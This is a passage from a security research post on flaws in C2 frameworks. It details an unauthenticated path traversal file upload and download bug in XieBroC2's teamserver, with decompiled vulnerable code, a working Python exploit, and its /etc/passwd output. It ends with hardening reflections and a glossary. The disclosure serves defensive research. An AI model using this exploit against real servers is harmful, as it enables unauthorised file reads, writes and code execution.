5. Verify on the teamserver host: ~/.emp3r0r/file-get/../../../../../tmp/ThisIsNotSupposedToBeCreated/pwned.txt resolves to /tmp/ThisIsNotSupposedToBeCreated/pwned.txt and is written there.

The vulnerable code was patched in this commit which uses filepath.Localize and then checking with filepath.isLocal.

XieBro C2

XieBroC2 is a C2 that has its teamserver written in .NET while the implant is written in Golang.

Interestingly enough, the teamserver is not open-source but there are compiled releases in the repository.

Using ilspy allows us to retrieve the source code by decompile .NET IL to C# which is much more readable.

As of Jan 2025, the author's biography states that the projects will no longer be maintained and updated.

Unauthenticated Arbitrary File Upload/Download (<= 3.1.8)

Overview

XieBroC2 exposes unauthenticated WebSocket endpoints /upload and /download on both the controller port (profile wsPort, default 8880) and every implant listener port. They accept raw MsgPack (no AES, no password) and allow path traversal for arbitrary file write/read once ChunkSize is nonzero.

Analysis of Vulnerable Code

In Teamserver/TeamServer.Listener.WebSocket/WSlistener.cs, there is no authentication added to the /upload and /download routes for the teamserver.

using System;
using TeamServer.Connection.WebSocket;
using WebSocketSharp.Server;

namespace TeamServer.Listener.WebSocket;

public class WSlistener
{
	public WebSocketServer ws_listener;

	public void StartTeamServerConnect(int Port)
	{
		try
		{
			ws_listener = new WebSocketServer(Port);
			ws_listener.AddWebSocketService<WsController>("/controller");
			ws_listener.AddWebSocketService<FileUploadHandler>("/upload");
			ws_listener.AddWebSocketService<FileDownloadHandler>("/download");
			ws_listener.Start();
			Settings.ColorfulConsole($"Teamserver connect port:{Port}", ConsoleColor.White);
		}
		catch (Exception ex)
		{
			Console.WriteLine(ex.Message);
		}
	}

	public void StartImplant(int Port, string PayloadType)
	{
		try
		{
			ws_listener = new WebSocketServer(Port);
			ws_listener.AddWebSocketService<WebSocketImplant>("/" + Settings.config.Route);
			ws_listener.AddWebSocketService<FileUploadHandler>("/upload");
			ws_listener.AddWebSocketService<FileDownloadHandler>("/download");
			ws_listener.Start();
			Settings.ColorfulConsole($"listener {PayloadType} Already started, Port:{Port}", ConsoleColor.White);
		}
		catch (Exception ex)
		{
			Console.WriteLine(ex.Message);
		}
	}

	public void Stop()
	{
		ws_listener.Stop();
	}
}

Teamserver/FileUploadHandler.cs (raw MsgPack, traversal) - No AES Encryption/Decryption is being done on the msgPack data. Additionally, there is no normalization on filename, meaning we can simply use ../ sequences to traverse directories.

msgPack.DecodeFromBytes(e.RawData); // (1) no encryption
string fileName = message.ForcePathObject("fileName").AsString;
string filePath = Path.Combine(UploadFolder, fileName ?? ""); // (2) no normalization
using (FileStream fs = new FileStream(filePath, FileMode.OpenOrCreate, FileAccess.Write, FileShare.None, 4096, useAsync: true))
{
    fs.Position = chunkIndex * ChunkSize;
    await fs.WriteAsync(chunkData, 0, chunkData.Length);
}

Teamserver/FileDownloadHandler.cs (raw MsgPack, traversal) - Similar to FileUploadHandler.cs, this is also present in FileDownloadHandler.cs.

msgPack.DecodeFromBytes(e.RawData); // (1) no encryption
fileName = unmsgpack.ForcePathObject("fileName").AsString;
string text = Path.Combine(fileFolder, fileName);  // (2) no normalization
byte[] GetFileChunk(long chunkIndex, string fileName)
{
    string path = Path.Combine(fileFolder, fileName);  // no normalization
    using FileStream fileStream = new FileStream(path, FileMode.Open, FileAccess.Read);
    // ...
}

However, one pre-requisite is that ChunkSize needs to be set first.

Teamserver/TeamServer/Connect.cs (only place ChunkSize is set):

msgpackB.ForcePathObject("ChunkSize").AsInteger = GetNetWorkSpeed.AdjustChunkSize();

ChunkSize defaults to 0 and is only set when Connect.ControlConnection runs during controller login. After any operator login (or a forged one), ChunkSize > 0 and the endpoints accept non-empty uploads, they are never re-protected on logout.

POC

Using python3 to craft our websocket payload, we are able to directly upload/download any file on the teamserver.

import msgpack, websocket
from Crypto.Cipher import AES

WS_HOST = "ws://192.168.125.128:8880"

def upload(path, data):
    ws = websocket.create_connection(f"{WS_HOST}/upload")
    ws.send(msgpack.packb({"type":"upload","fileName":path,"chunkIndex":0,"totalChunks":1,"chunkData":data}, use_bin_type=True), opcode=0x2)
    print("upload resp:", msgpack.unpackb(ws.recv(), raw=False)); ws.close()

def download(path):
    ws = websocket.create_connection(f"{WS_HOST}/download")
    ws.send(msgpack.packb({"type":"query","fileName":path}, use_bin_type=True), opcode=0x2)
    total = msgpack.unpackb(ws.recv(), raw=False)["totalChunks"]
    chunks = []
    for i in range(total):
        ws.send(msgpack.packb({"type":"download","chunkIndex":i,"totalChunks":total}, use_bin_type=True), opcode=0x2)
        chunks.append(msgpack.unpackb(ws.recv(), raw=False)["chunkData"])
    ws.close(); return b"".join(chunks)

# controller_login()  # sets ChunkSize
target = "../../../../../etc/passwd"
print("downloaded:", download(target))

Over here, I am able to read /etc/passwd on the teamserver. However, this is limited to what privileges the teamserver is running as (usually root).

PS E:\c2Research\XiebroC2\pocs> py .\exploit.py
Downloaded bytes: b'root:x:0:0:root:/root:/usr/bin/zsh\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin\ndhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false\nsystemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin\nmessagebus:x:101:102::/nonexistent:/usr/sbin/nologin\ntss:x:102:104:TPM software stack,,,:/var/lib/tpm:/bin/false\nstrongswan:x:103:65534::/var/lib/strongswan:/usr/sbin/nologin\ntcpdump:x:104:105::/nonexistent:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin\navahi:x:106:108:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin\nnm-openvpn:x:107:109:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin\nspeech-dispatcher:x:108:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false\nusbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\npulse:x:110:110:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin\nnm-openconnect:x:111:113:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologin\nlightdm:x:112:114:Light Display Manager:/var/lib/lightdm:/bin/false\nsaned:x:113:116::/var/lib/saned:/usr/sbin/nologin\npolkitd:x:991:991:User for polkitd:/stgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\nmosquitto:x:131:133::/var/lib/mosquitto:/usr/sbin/nologin\ninetsim:x:132:134::/var/lib/inetsim:/usr/sbin/nologin\n_gvm:x:133:136::/var/lib/openvas:/usr/sbin/nologin\nkali:x:1000:1000:,,,:/home/kali:/usr/bin/zsh\nsystemd-coredump:x:987:987:systemd Core Dumper:/:/usr/sbin/nologin\nfwupd-refresh:x:986:986:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin\nuuidd:x:134:140::/run/uuidd:/usr/sbin/nologin\n_bloodhound:x:135:141::/var/lib/bloodhound:/usr/sbin/nologin\n'
PS E:\c2Research\XiebroC2\pocs>

This can technically be escalated into an RCE with cron.

Reflection

Open-source C2s are usually pretty solid, but they’re not automatically “safe.” Like any complex security tool, they can still have weird edge cases or vulnerable sinks.

It is important to preface that many of the bugs found in this article have a low chance of being exploited in a properly hardened red-team setup as seen below.

Secure C2 Infrastructure taken from ZeroPointSecurity's CRTO2 course

Take the Denial of Service on Adaptix for example. In a secure C2 intrastructure, a malicious attacker should never be able to contact the teamserver directly due to the use of redirectors. The redirectors would also have rate-limiting and other guardrails in place.

It’s also worth noting that different C2s draw the trust boundary differently. For example, Sliver has previously stated in a past issue that "there is a clear security boundary between the operator and server, an operator should not inherently be able to run commands or code on the server". Other frameworks may not enforce that same split, not necessarily as a flaw, but because of different design goals, constraints, or assumptions about how the C2 will be deployed and used.

C2 Glossary

Operator — Red team member who interacts with the C2 framework via a client/GUI to task implants and view results.

Teamserver — Central backend server that manages listeners, stores data, and coordinates all C2 operations. Operators connect to this.

Implant — Malicious code running on a compromised host that communicates with the teamserver. Also called agent, beacon, or payload.

Agent — Same as implant. Term varies by framework (Sliver uses "implant", Cobalt Strike uses "beacon", Mythic uses "agent").

Beacon — Implant that periodically "checks in" with the teamserver for new tasks rather than maintaining a constant connection.

Listener — Service on the teamserver that waits for incoming connections from implants. Configured per protocol (HTTP, DNS, SMB, etc).

Redirector — Proxy server between implants and teamserver. Hides the real teamserver IP and can be burned/replaced if discovered.

Stager — Small initial payload that downloads and executes the full implant. Keeps initial delivery small.